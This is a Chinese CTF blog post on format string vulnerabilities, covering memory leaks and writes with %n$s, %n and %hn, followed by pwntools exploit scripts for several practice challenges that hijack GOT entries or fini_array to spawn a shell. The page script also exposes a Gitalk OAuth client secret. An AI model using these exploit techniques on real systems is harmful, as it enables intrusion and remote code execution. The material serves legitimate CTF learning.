<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Format String - 秋秋晚</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="秋秋晚"><meta name="msapplication-TileImage" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="秋秋晚"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="格式化字符串"><meta property="og:type" content="blog"><meta property="og:title" content="秋秋晚"><meta property="og:url" content="https://lhxhl.github.io/"><meta property="og:site_name" content="秋秋晚"><meta property="og:description" content="格式化字符串"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg"><meta property="article:published_time" content="2021-12-12T14:15:50.183Z"><meta property="article:modified_time" content="2022-05-09T05:53:34.292Z"><meta property="article:author" content="秋秋晚"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://lhxhl.github.io/2021/12/12/fmt/"},"headline":"秋秋晚","image":["https://tva1.sinaimg.cn/large/008i3skNgy1gy5gym9j56j30h6042glr.jpg","https://s3.bmp.ovh/imgs/2021/12/c83206ce94d8c023.png"],"datePublished":"2021-12-12T14:15:50.183Z","dateModified":"2022-05-09T05:53:34.292Z","author":{"@type":"Person","name":"秋秋晚"},"description":"格式化字符串"}</script><link rel="canonical" href="https://lhxhl.github.io/2021/12/12/fmt/"><link rel="icon" href="https://tva1.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><meta name="generator" content="Hexo 6.1.0"></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">秋秋晚</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Join Gitter" href="https://gitter.im/hexo-theme-amazing/community"><i class="fab fa-gitter"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><!--!--><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2021-12-12  <a class="commentCountImg" href="/2021/12/12/fmt/#comment-container"><span class="display-none-class">5a1b61bdf3c784f17af3c6ab5ce1ee79</span><i class="far fa-comment-dots"></i> <span class="commentCount" id="5a1b61bdf3c784f17af3c6ab5ce1ee79">99+</span>  </a><span class="level-item"><i class="far fa-clock"> </i>10 分钟  <i class="fas fa-pencil-alt"> </i>1.5 k</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">Format String</h1><div class="content"><h1 id="格式化字符串"><a href="#格式化字符串" class="headerlink" title="格式化字符串"></a>格式化字符串</h1><span id="more"></span>

<p><strong>格式化字符串漏洞在理由时一般分为三个部分</strong></p>
<ul>
<li><strong>格式化字符串函数</strong></li>
<li><strong>格式化字符串</strong></li>
<li><strong>要输出的变量（可选）</strong></li>
</ul>
<p><strong>具体原理可参考CTF-WIKI，<del>这里主要记录下做题的过程</del>（👴又🥬又懒🐶，写不动🌶️</strong></p>
<p><strong>2022-1-7更新。。。感觉还是有些点问题，比如内存写入不太清晰，还是写下笔记，这里主要是32位下的程序</strong></p>
<h2 id="泄漏内存数据"><a href="#泄漏内存数据" class="headerlink" title="泄漏内存数据"></a>泄漏内存数据</h2><ul>
<li><strong>泄漏栈上内容</strong></li>
</ul>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">32位： %n$x (return栈上第n+1个参数值)</span><br><span class="line">64位： %n$p (return栈上第n-5个参数值)（64位下优先寄存器传参</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>泄漏内存地址的内容</strong></li>
</ul>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">32位： %n$s：把栈上第n+1个参数的值作为地址，返回该地址内存的值</span><br><span class="line">64位： %n$s：把栈上第n-5个参数的值作为地址，返回该地址内存的值</span><br></pre></td></tr></table></figure>

<h2 id="覆写内存数据"><a href="#覆写内存数据" class="headerlink" title="覆写内存数据"></a>覆写内存数据</h2><ul>
<li><strong>形式和泄漏类似，将$s改为$n</strong></li>
<li><strong>用%xc控制写入字符数</strong></li>
</ul>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">%</span><span class="language-bash">***c%n<span class="variable">$n</span>：  把栈上第n+1个参数的值作为地址，将该地址的高32bit值改为 hex(***)</span></span><br><span class="line"><span class="meta prompt_">%</span><span class="language-bash">***c%n<span class="variable">$hn</span>： 把栈上第n+1个参数的值作为地址，将该地址的高16bit值改为 hex(***)</span></span><br><span class="line"><span class="meta prompt_">%</span><span class="language-bash">***c%n<span class="variable">$hhn</span>：把栈上第n+1个参数的值作为地址，将该地址的高8bit值改为 hex(***)</span></span><br><span class="line">hh一个字节，h双字节</span><br></pre></td></tr></table></figure>

<p><strong>例如</strong></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">int</span> x = <span class="number">3</span>;</span><br><span class="line">	<span class="type">int</span>* p;</span><br><span class="line">	p = &amp;x;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;0x12345678%n\n&quot;</span>, p);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;x = %d\n&quot;</span>, x);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>这样x的值就会被修改为10</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNgy1gy5gym9j56j30h6042glr.jpg"></p>
<h1 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h1><h2 id="Jarvis-OJ-fm"><a href="#Jarvis-OJ-fm" class="headerlink" title="[Jarvis OJ]fm"></a>[Jarvis OJ]fm</h2><p><strong>这题逻辑挺简单，x初始化为3，当修改x=4时就可以读出flag，所以我们就要利用format string将x对应内存地址处的值改为4</strong></p>
<p><strong>然后偏移的话，利用pwngdb的插件fmtarg算出是11</strong></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="built_in">printf</span>(x_address+<span class="string">&quot;%c$n&quot;</span>)</span><br><span class="line">可以修改[x_address]的值为x_address的字符长度</span><br><span class="line">这里很巧的一点就是p32(x_addr)的长度刚好是<span class="number">4</span>个字节</span><br></pre></td></tr></table></figure>

<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = remote(<span class="string">&#x27;pwn2.jarvisoj.com&#x27;</span> ,<span class="number">9895</span>)</span><br><span class="line"></span><br><span class="line">x_addr = <span class="number">0x0804A02C</span></span><br><span class="line">payload = p32(x_addr) + <span class="string">b&quot;%11$n&quot;</span></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="实时数据监测"><a href="#实时数据监测" class="headerlink" title="实时数据监测"></a>实时数据监测</h2><p><strong>可以直接覆盖，也可以双字节覆盖</strong></p>
<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;111.200.241.244&#x27;</span>, <span class="number">54060</span>)</span><br><span class="line"><span class="comment">#io = process(&#x27;./mon&#x27;)</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">key_bss = <span class="number">0x0804A048</span></span><br><span class="line">offset = <span class="number">12</span></span><br><span class="line"><span class="comment">#payload = fmtstr_payload(offset, &#123;key_bss:0x02223322&#125;)</span></span><br><span class="line"></span><br><span class="line">payload = p32(key_bss+<span class="number">2</span>) + p32(key_bss)</span><br><span class="line">payload += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x0222</span> - <span class="number">8</span>) + <span class="string">&quot;c%12$hn&quot;</span></span><br><span class="line">payload += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x3322</span> - <span class="number">0x0222</span>) + <span class="string">&quot;c%13$hn&quot;</span></span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="inndy-echo"><a href="#inndy-echo" class="headerlink" title="inndy_echo"></a>inndy_echo</h2><p><strong>导入IDA中可以看到</strong></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">do</span></span><br><span class="line"> &#123;</span><br><span class="line">   fgets(&amp;s, <span class="number">256</span>, <span class="built_in">stdin</span>);</span><br><span class="line">   <span class="built_in">printf</span>(&amp;s);</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="built_in">strcmp</span>(&amp;s, <span class="string">&quot;exit\n&quot;</span>) );</span><br><span class="line"> system(<span class="string">&quot;echo Goodbye&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><strong>在printf处可以利用，先在gdb中算出偏移是7，然后我们看到有system函数，我们就可以利用GOT HiJack将<code>printf@got</code>的内容改写成<code>system@plt</code>的地址,再写入<code>/bin/sh\x00</code>执行</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;echo&#x27;</span>)</span><br><span class="line"><span class="comment">#io = process(&#x27;./echo&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">26569</span>)</span><br><span class="line"><span class="comment">#context.terminal = [&#x27;tmux&#x27;,&#x27;splitw&#x27;,&#x27;-h&#x27;]</span></span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">system_plt = elf.plt[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = fmtstr_payload(<span class="number">7</span>,&#123;printf_got:system_plt&#125;)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.send(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="wdb-2018-2nd-easyfmt"><a href="#wdb-2018-2nd-easyfmt" class="headerlink" title="wdb_2018_2nd_easyfmt"></a>wdb_2018_2nd_easyfmt</h2><p><strong>首先查看文件是32位的只开了NX保护，用ida打开看下程序逻辑</strong></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Do you know repeater?&quot;</span>);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    read(<span class="number">0</span>, &amp;buf, <span class="number">0x64</span>u);</span><br><span class="line">    <span class="built_in">printf</span>(&amp;buf);</span><br><span class="line">    <span class="built_in">putchar</span>(<span class="number">10</span>);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p><strong>看上去就是写了个死循环，重复输入输出，且<code>printf</code>处存在格式化字符漏洞</strong></p>
<ul>
<li><p><strong>首先找到格式化字符的偏移，用fmtarg发现是<code>The index of format argument : 7 (&quot;\%6$p&quot;)</code></strong></p>
</li>
<li><p><strong>通过<code>printf@got</code>的地址leak出我们想要的<code>printf_addr</code>，然后利用libc算出<code>system</code>(因为这里程序没有调用system函数，我们只能在libc中找)</strong></p>
</li>
<li><p><strong>然后覆写<code>printf@got</code>地址为system的地址，再发送执行<code>/bin/sh\x00</code>拿到shell</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">payload = p32(printf_got) + <span class="string">&quot;%6$s&quot;</span></span><br><span class="line">io.recvuntil(<span class="string">&quot;repeater?\n&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv(<span class="number">4</span>) <span class="comment">#先接收print@got的地址，然后才是我们想要泄漏的</span></span><br><span class="line">printf_addr = u32(io.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(printf_addr))</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>下面红框里的才是我们需要的，蓝色框是<code>printf@got</code>的地址</strong></p>
<p><img src="https://s3.bmp.ovh/imgs/2021/12/c83206ce94d8c023.png"></p>
<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding=UTF-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#io = process(&#x27;./eyfmt&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28484</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./eyfmt&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.23_32.so&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">payload = p32(printf_got) + <span class="string">&quot;%6$s&quot;</span></span><br><span class="line">io.recvuntil(<span class="string">&quot;repeater?\n&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv(<span class="number">4</span>) <span class="comment">#先接收print@got的地址，然后才是我们想要泄漏的</span></span><br><span class="line">printf_addr = u32(io.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(printf_addr))</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">因为这里LibcSearch不能用，libc文件在buu上下载</span></span><br><span class="line"><span class="string">libc = LibcSearch(&#x27;printf&#x27;, printf_addr)</span></span><br><span class="line"><span class="string">libc_base = printf_addr - libc.dump[&#x27;printf&#x27;]</span></span><br><span class="line"><span class="string">system = libc_base + libc.dump[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">libc_base = printf_addr - libc.symbols[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(system))</span><br><span class="line"></span><br><span class="line">payload1 = fmtstr_payload(<span class="number">6</span>,&#123;printf_got:system&#125;)</span><br><span class="line">io.sendline(payload1)</span><br><span class="line">io.send(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="greeting-150"><a href="#greeting-150" class="headerlink" title="greeting-150"></a>greeting-150</h2><p><strong>攻防世界的一道题目，格式化字符串任意写以及 <code>_do_global_dtors_aux_fini_array_entry</code>循环利用</strong></p>
<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./greeting&#x27;</span>)</span><br><span class="line">io = remote(<span class="string">&#x27;111.200.241.244&#x27;</span>, <span class="number">50819</span>)</span><br><span class="line"></span><br><span class="line">fini_arr = <span class="number">0x08049934</span></span><br><span class="line">main = <span class="number">0x080485ED</span></span><br><span class="line">strlen_got = <span class="number">0x08049A54</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;k&#x27;</span> * <span class="number">2</span> <span class="comment"># 2</span></span><br><span class="line">payload += p32(strlen_got+<span class="number">2</span>)</span><br><span class="line">payload += p32(fini_arr+<span class="number">2</span>)</span><br><span class="line">payload += p32(strlen_got)</span><br><span class="line">payload += p32(fini_arr)</span><br><span class="line"><span class="comment">#16</span></span><br><span class="line">pad_len = <span class="built_in">len</span>(<span class="string">&quot;Nice to meet you, &quot;</span>) <span class="comment">#18</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload += <span class="string">b&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x0804</span> - <span class="number">0x24</span>) + <span class="string">&quot;c%12$hn%13$hn&quot;</span></span><br><span class="line">payload += <span class="string">b&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x8490</span> - <span class="number">0x0804</span>) + <span class="string">&quot;c%14$hn&quot;</span></span><br><span class="line">payload += <span class="string">b&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x85ED</span> - <span class="number">0x8490</span>) + <span class="string">&quot;c%15$hn&quot;</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Please tell me your name... &quot;</span>, payload)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">&quot;Please tell me your name... &quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="CISCN-2019西南-PWN1"><a href="#CISCN-2019西南-PWN1" class="headerlink" title="[CISCN 2019西南]PWN1"></a>[CISCN 2019西南]PWN1</h1><p><strong>这题和上题基本上一样的，循环➕任意覆盖地址</strong></p>
<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;1.14.71.254&#x27;</span>, <span class="number">28030</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./ciscn_2019_sw_pwn1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main = <span class="number">0x08048534</span></span><br><span class="line">fini_addr = <span class="number">0x0804979C</span></span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">system_plt = <span class="number">0x080483d0</span></span><br><span class="line"></span><br><span class="line">payload = p32(printf_got + <span class="number">2</span>) + p32(fini_addr + <span class="number">2</span>) + p32(printf_got) + p32(fini_addr)</span><br><span class="line">payload += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x0804</span> - <span class="number">16</span>) + <span class="string">&quot;c%4$hn%5$hn&quot;</span></span><br><span class="line">payload += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x83d0</span> - <span class="number">0x0804</span>) + <span class="string">&quot;c%6$hn&quot;</span></span><br><span class="line">payload += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(<span class="number">0x8534</span> - <span class="number">0x83d0</span>) + <span class="string">&quot;c%7$hn&quot;</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">&#x27;name?&#x27;</span>, payload)</span><br><span class="line">io.recvuntil(<span class="string">&quot;name?&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<p><strong>TODO..</strong></p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><strong><a target="_blank" rel="noopener" href="https://cartermgj.github.io/2018/01/16/fsb_summary/">https://cartermgj.github.io/2018/01/16/fsb_summary/</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-42943-1-1.html?from=bkyl">https://bbs.ichunqiu.com/thread-42943-1-1.html?from=bkyl</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_42728977/article/details/102880186?spm=1001.2014.3001.5501">https://blog.csdn.net/qq_42728977/article/details/102880186?spm=1001.2014.3001.5501</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://blog.csdn.net/seaaseesa/article/details/102985263?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164207018816780261995209%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=164207018816780261995209&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-102985263.first_rank_v2_pc_rank_v29&amp;utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cgreeting-150&amp;spm=1018.2226.3001.4187">https://blog.csdn.net/seaaseesa/article/details/102985263?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164207018816780261995209%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=164207018816780261995209&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-102985263.first_rank_v2_pc_rank_v29&amp;utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cgreeting-150&amp;spm=1018.2226.3001.4187</a></strong></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>Format String</p><p><a href="https://lhxhl.github.io/2021/12/12/fmt/">https://lhxhl.github.io/2021/12/12/fmt/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><a href="https://lhxhl.github.io"><p>秋秋晚</p></a></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-12-12</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-05-09</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="recommend-area"><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># 相关文章</span><br><span>  1.<a class="is-size-6" href="/2022/04/19/*CTF2022/" target="_blank">🌟CTF2022-Web部分WriteUp</a><br></span><span>  2.<a class="is-size-6" href="/2022/03/24/wyy/" target="_blank">爬取网易云评论数据</a><br></span><span>  3.<a class="is-size-6" href="/2022/03/14/burp_unser/" target="_blank">Burpsuite---反序列化专题</a><br></span><span>  4.<a class="is-size-6" href="/2022/03/12/burp_file_upload/" target="_blank"> </a><br></span><span>  5.<a class="is-size-6" href="/2022/03/12/burp_ssrf/" target="_blank">Burpsuite---SSRF专题</a><br></span><span>  6.<a class="is-size-6" href="/2022/03/10/burp_os/" target="_blank">Burpsuite靶场---命令注入专题</a><br></span><span>  7.<a class="is-size-6" href="/2022/03/10/burp_dir_tra/" target="_blank">Burpsuite靶场---目录穿越专题</a><br></span><span>  8.<a class="is-size-6" href="/2022/03/06/burp_authentication/" target="_blank">Burpsuite靶场----身份认证专题</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/01/27/bomb/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CSAPP之Bomb LAB</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/12/11/prc_pwn/"><span class="level-item">PWN刷题记录</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--><div class="card"><div class="card-content"><div class="title is-5">评论</div><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            language:'zh-CN',
            id: '5a1b61bdf3c784f17af3c6ab5ce1ee79',
            repo: 'blog_comment',
            owner: 'LHXHL',
            clientID: '9901fc9cd07fca97d9c5',
            clientSecret: '676e4024a92c4843a002172e7c57dd2a9875f238',
            admin: ["LHXHL"],
            createIssueManually: true,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            proxy: 'https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token',
            
            enableHotKey: true,
            isLocked: false
        })
        gitalk.render('comment-container')});</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><!--!--><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg" alt="秋秋晚"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">秋秋晚</p><p class="is-size-6 is-block">Web &amp;&amp; Pentest &amp;&amp; Moonlight</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>白玉盘</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">21</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/LHXHL" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/LHXHL"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div><div><hr><p id="hitokoto">:D 一言句子获取中...</p><script type="text/javascript" defer>function getYiyan(){
                                $.getJSON("https://v1.hitokoto.cn/", function (data) {
                                if(data){
                                    $('#hitokoto').html("");
                                    $('#hitokoto').append("<strong style='color: #3273dc;'>"+data.hitokoto+"</strong>"+
